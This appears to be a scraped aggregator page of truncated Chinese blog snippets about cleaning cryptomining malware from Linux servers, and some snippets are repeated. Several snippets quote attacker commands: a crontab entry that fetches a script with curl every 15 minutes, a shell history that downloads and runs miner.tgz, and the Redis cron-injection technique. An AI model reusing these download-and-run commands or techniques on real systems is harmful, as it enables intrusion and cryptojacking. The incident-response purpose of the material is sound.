Linux被kdevtmpfsi挖矿病毒入侵 一....错误信息 二.解决问题 1.首先停掉kdevtmpfsi的程序 2.删除Linux下的异常定时任务 3.结束kdevtmpfsi进程及端口占用 4.删除掉kdevtmpfsi的相关文件 三.怎么预防处理这个病毒...1.首先停掉kdevtmpfsi的程序 ps aux 找到kdevtmpfsi的进程 删除掉与kdevtmpfsi相关的进程 kill -9 20267 kill -9 20367 2.删除Linux
今天来给大家分享下这两天遇到的一个问题,服务器被挖矿了,把我的排查记录分享下,希望能帮到有需要的同学。...问题原因 ---- 多台服务器持续告警CPU过高,服务器为K8s的应用节点,正常情况下CPU使用率都挺低的,通过排查是原因是被挖矿了,下面为定位过程 定位过程 ---- 登陆问题主机10.92.0.X,...cpu使用率基本跑满(用户态),没有发现可疑的进程,初步怀疑可能是进程在哪里隐藏了 执行命令ps -aux --sort=-pcpu|head -10 嗯哼,藏得够深的,可还是被揪出来啦 ? ?...阻断挖矿程序链接外网服务(很重要) 在/etc/hosts里增加一条 127.0.0.1 g.upxmr.com 阻断挖矿程序链接外网下载可执行文件,不加了的话干掉服务又会起来(除非把服务器网断了) 2...这次分享希望对也中挖矿程序的同学, 提供一些排查思路
我们发现黑客主要是利用 Redis 未授权访问问题进行入侵,对于该问题的说明可以参考我们过去做的一些分析: https://mp.weixin.qq.com/s/inazTPN5mHJYnt2QDliv8w 在服务器被入侵后...在变更文件里可以看到一些挖矿程序,同时 /etc/ld.so.preload 文件的变更需要引起注意,这里涉及到 Linux 动态链接库预加载机制,是一种常用的进程隐藏方法,而 top 等命令都是受这个机制影响的...在 Linux 操作系统的动态链接库加载过程中,动态链接器会读取 LD_PRELOAD 环境变量的值和默认配置文件 /etc/ld.so.preload 的文件内容,并将读取到的动态链接库进行预加载,即使程序不依赖这些动态链接库...——段落引自《警惕利用 Linux 预加载型恶意动态链接库的后门》 通过查看文件内容,可以看到加载一个 .so 文件:/usr/local/lib/libjdk.so ?...继续分析变更的文件,还能看到相关文件也被变更,比如黑客通过修改 /etc/rc.d/init.d/network 文件来进行启动: ? 同时修改 /etc/resolv.conf : ?
攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。...tmp/conn /tmp/conn: PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced 首先下载了一个图片,然后通过dd提取出来挖矿程序...[root@server120 tmp]# file /tmp/conns /tmp/conns: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux...这种通过Redis未授权拿服务器挖矿的情况很常见。 处理过程 1)redis增加认证,清空/var/spool/cron/root和authorized_keys。
文章目录 中毒特征磁盘cpu 跑满 100% 如何处理 反复发作 中毒特征磁盘cpu 跑满 100% 如何处理 电脑中了挖矿病毒 ps -aux | grep kinsing root 19447
记一次挖矿程序入侵以及解决实操! 1,过程记录 系统被挖矿程序入侵,导致系统CPU飙升。kill掉进程后自动重启。
Linux清理挖矿程序@bug Linux清理挖矿程序 最近服务器经常被挖矿,一些经验 1....找到挖矿程序 挖矿程序跑起来几乎占满了所有的CPU,以及GPU,用watch -n1 nvidia-smi可以实时看到挖矿程序的PID号,此时不能用kill -9 PID号来进行清除,会发现它换一个PID...使用top可以看到挖矿程序进程名字xxx(command一行),ps aux|grep xxx 或者ls -l /proc/{PID号}/exe 找到病毒程序的路径位置 2.
很多客户网站服务器被入侵,被攻击,找到我们SINE安全公司寻求技术支持与帮助,有些网站被篡改,被跳转,首页内容被替换,服务器植入木马后门,服务器卡顿,服务器异常网络连接,有的客户使用的是阿里云服务器,经常被提醒服务器有挖矿程序...首先我们会对当前服务器的IP,以及IP的地址,linux服务器名称,服务器的版本是centos,还是redhat,服务器的当前时间,进行收集并记录到一个txt文档里,接下来再执行下一步,对当前服务器的异常网络连接以及异常的系统进程检查...并对连接的IP,进行归属地查询,如果是国外的IP,直接记录当前进程的PID值,并自动将PID的所有信息记录,查询PID所在的linux文件地址,紧接着检查当前占用CPU大于百分之30的进程,并检查该进程所在的文件夹...对服务器的启动项进行检查,有些服务器被植入木马后门,即使重启服务器也还是被攻击,木马会自动的启动,检查linux的init.d的文件夹里是否有多余的启动文件,也可以检查时间,来判断启动项是否有问题。...最重要的是检查服务器的定时任务,前段时间某网站客户中了挖矿病毒,一直占用CPU,查看了定时任务发现每15分钟自动执行下载命令,crontab -l */15 * * * * (curl -fsSL https
看小电影的要小心挖矿的。 随着数字加密货币价格的持续暴涨,“发家致富靠挖矿”在币圈疯传。一时间,各种挖矿教程风靡全球,更可怕的是,很多路人看个小电影、蹭个WiFi的时候,其实已经被迫成为挖矿一员。...挖矿病毒猖獗:算力不够人数来凑 随着“挖矿”的大热,肩负着挖矿使命的病毒也跃升为今年最火的病毒,默默吃瓜的我们可能一不小心就秒变“矿工”。...根据公布的脚本可以看出,黑客主要通过入侵WIFI连接页面,使其被植入挖矿代码,从而导致用户在连接WIFI时执行挖矿程。...用户只要打开这个软件就必须授予相应的权限,在软件获得权限后会自动“伪装”成为杀毒软件,表面上看起来对手机一点害处都没有,甚至还会帮助手机清理其他的流氓软件,但是一旦获取足够的权限和信任,用户就会收到乱七八糟的短信和电话,还会“被订购各种服务...结语 由各类吃瓜群众“被矿工”现象,挖矿大军的疯狂程度可见一斑,另外显卡市场的混乱程度也十足的体现出了“挖矿”的火热:截止目前RX 580的价格再次上涨至建议零售价的1.7倍以上,A卡全面缺货,N卡全面涨价
aux | grep -v PID | sort -rn -k 4 |head 发现 有一个yam开头的进程CPU已经占用120%,(此处无截图) 经确认,并非业务上的应用,凭经验分析,可以断定是被入侵了...打开看一下里面的内容发现是一个挖矿机。 ? 3.查看下登录日志 last ?...:9090/miner.tgz 885 vi /etc/rc.d/rc.local 886 tar zxvf miner.tgz 887 cd yam-yvg1900-M7v-linux64...-generic 888 cd linux64-generic 889 nohup .
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/149135.html原文链接:https://javaforall.cn
故事背景 最新收到报警消息,一直提示服务器CPU 100%,然后登入服务器用top一看,发现并没有进程特别占用CPU,马上第一直觉就是top命令已经被篡改。需要借助其他的工具。...安装busybox 系统有故障,登录后如果发现用正常的命令找不到问题,那么极有可能该命令被篡改。 BusyBox 是一个集成了三百多个最常用Linux命令和工具的软件,里面就有我需要的top命令。...> busybox top image-20210629223207356 终于看到了这个kthreaddi进程,上网一查这个东西叫门罗币挖矿木马,伪装的实现是太好了和系统中的正常进程kthreadd...去内核数据目录找找看 > ls -al ll /proc/6282 6282是刚才那个挖矿进程 image-20210629224536853 原来在 tmp下面有文章 ,但是被 deleted...pid reboot重启 总结 本次服务器被挖矿,有可能是docker没有TLS通讯加密,也有可能是redis的弱密码,被入侵。
故事背景 最新收到报警消息,一直提示服务器CPU 100%,然后登入服务器用top一看,发现并没有进程特别占用CPU,马上第一直觉就是top命令已经被篡改。需要借助其他的工具。...安装busybox 系统有故障,登录后如果发现用正常的命令找不到问题,那么极有可能该命令被篡改。 BusyBox 是一个集成了三百多个最常用Linux命令和工具的软件,里面就有我需要的top命令。...去内核数据目录找找看 > ls -al ll /proc/6282 6282是刚才那个挖矿进程 [image-20210629224536853] 原来在 tmp下面有文章 ,但是被 deleted...pid reboot重启 总结 本次服务器被挖矿,有可能是docker没有TLS通讯加密,也有可能是redis的弱密码,被入侵。...原文链接:https://rumenz.com/rumenbiji/linux-kthreaddi.html
0x00 前言 随着虚拟货币的疯狂炒作,利用挖矿脚本来实现流量变现,使得挖矿病毒成为不法分子利用最为频繁的攻击方式。...新的挖矿攻击展现出了类似蠕虫的行为,并结合了高级攻击技术,以增加对目标服务器感染的成功率,通过利用永恒之蓝(EternalBlue)、web攻击多种漏洞(如Tomcat弱口令攻击、Weblogic WLS...组件漏洞、Jboss反序列化漏洞、Struts2远程命令执行等),导致大量服务器被感染挖矿程序的现象 。...D、漏洞修复 升级struts到最新版本 0x03 防范措施 针对服务器被感染挖矿程序的现象,总结了几种预防措施: 1、安装安全软件并升级病毒库,定期全盘扫描,保持实时防护 2、及时更新 Windows
故事背景 最新收到报警消息,一直提示服务器CPU 100%,然后登入服务器用top一看,发现并没有进程特别占用CPU,马上第一直觉就是top命令已经被篡改。需要借助其他的工具。...安装busybox 系统有故障,登录后如果发现用正常的命令找不到问题,那么极有可能该命令被篡改。 BusyBox 是一个集成了三百多个最常用Linux命令和工具的软件,里面就有我需要的top命令。...去内核数据目录找找看 > ls -al ll /proc/6282 6282是刚才那个挖矿进程 图片 原来在 tmp下面有文章 ,但是被 deleted,不管先去看看 > /tmp/.dHyUxCd...本次服务器被挖矿,有可能是docker没有TLS通讯加密,也有可能是redis的弱密码,被入侵。...原文链接:https://rumenz.com/rumenbiji/linux-kthreaddi.html
对于 Linux 安全检查,个人上段时间写了个 shell 用于一键进行 Linux 安全检查,本文对 Linux 的检查使用相关脚本均可实现,相关链接如下: https://mp.weixin.qq.com...,某用户 OA 被 360 浏览器提示「网站存在数字货币挖矿行为」,我司应急响应小组进行分析后确认为真实事件,随后进行黑客入侵分析。...2.1 入侵现象 2018 年 11 月 8 日,我司「捕影」应急响应小组接到驻场团队反馈,某用户 OA 被 360 浏览器提示「网站存在数字货币挖矿行为」,具体情况如下所示: ?...图 2-OA 加载 JS 脚本 对这一 JS 脚本进行分析,发现该脚本的确被植入 JS 挖矿脚本,具体如下: ? 图 3-OA 加载挖矿脚本 ? 图 4-挖矿 JS 代码功能 ?...2.3 系统分析 服务器被植入挖矿脚本说明服务器肯定被黑客入侵了,由于目前 OA 系统服务器仅 6001 端口对互联网开放,因此通过 web 应用入侵的可能性比较大。
分享一次Linux系统杀毒的经历,还有个人的一些总结,希望对大家有用。 进程占CPU 700%,进程名字是类似XY2Arv的6位随机大小写字母+数字的字符串。...最终发现是一个叫systemd或trump的病毒,是一个挖矿的病毒,在挖一种叫门罗币(XMR)的数字货币。...authotrized_keys 文件中,进而可以直接登录目标服务器;如果Redis服务是以root权限启动,可以利用该问题直接获得服务器root权限 整个入侵流程大概是包含以下几个环节: 1、扫描开放6379端口的Linux...文件里的利用命令将Redis的数据文件修改为/var/spool/cron/root,然后通过在Redis中插入数据,将下载执行脚本的动作写入crontab任务 3、通过脚本实现以上的相关行为,完成植入并启动挖矿程序
这个挖矿木马我们可以命名为猪猪挖矿,之所以这样起名也是觉得攻击的特征,以及繁衍感染的能力太强,我们称之为猪猪挖矿木马。...关于如何检测以及防护挖矿木马,我们通过这篇文章来给大家讲解一下,希望大家能够日后遇到服务器被挖矿木马攻击的时候可以应急处理,让损失降到最低。 ?...挖矿木马是2018年底开始大批量爆发的,我们对猪猪挖矿进行了详细的跟踪与追查分析,主要是通过thinkphp的网站漏洞进行攻击服务器,然后在服务器里置入木马后门,以及挖矿木马,该木马的特征如下:内置了许多木马后门...攻击者最初使用的是thinkphp5的漏洞来攻击网站,然后通过网站的权限来拿到服务器的root权限,被挖矿的基本都是linux centos服务器,然后置入到linux系统里木马进程,并将58.65.125.98IP...针对服务器被挖矿木马攻击的处理及安全解决方案 尽快的升级thinkphp系统的版本,检测网站源代码里是否留有攻击者留下的木马后门,对网站开启硬件防火墙,随时的检测攻击,使用其他网站开源系统的运营者,建议尽快升级网站系统到最新版本
近期遇到了一次我们自建Kubernetes集群中某台机器被入侵挖矿, 后续也找到了原因, 所幸只是用来挖矿… 网络安全是个严肃的问题, 它总是在不经意间出现, 等你反应过来却已经迟了....入侵现象 检查到某台机器中出现了异常进程 简单来讲, 就是我们的机器被用来挖矿了… 问题出现后, 我们第一时间关闭了docker, 其实应该隔离下环境, 把挖矿程序dump下来, 以便后续分析....具体原因排查 iptables为空 出现了异常进程, 肯定是被入侵了, 我首先看的是iptables....果不其然, 机器上的iptables规则是空的, 意味着这台机器在裸奔. kubelet裸奔 内部同事提出了有可能是kubelet被入侵的问题, 检查过其他组件后, 开始检查kubelet组件 最后检查到...kubelet日志中有异常: kubelet设置不当 确认入侵问题, kubelet参数设置错误, 允许直接访问kubelet的api 发现是kubelet的启动项中, 该位置被注释掉: 然后文件中禁止匿名访问的配置没有读取
排查过程 我以 150+ 的手速立即打开了服务器,看到 Tomcat 挂了,然后顺其自然的重启,启动过程中直接被 killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果。...好尴尬,但是心思细腻的我早知道没这么简单,肯定只是伪装,crul 过去是下面的脚本,过程就是在挖矿: ? 有兴趣的同学想查看以上完整源代码,命令行运行下面指令(不分操作系统,方便安全无污染): ?...等等,这远远不够,考虑到能被拿去挖矿的前提下你的服务器都已经被黑客入侵了,修复漏洞才对,不然你杀掉进程删掉文件后,黑客后门进来 history 一敲,都知道你做了啥修复手段。...遇到挖矿木马最好的解决方式:将主机镜像、找出病毒木马、分析入侵原因、检查业务程序、重装系统、修复漏洞、再重新部署系统。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
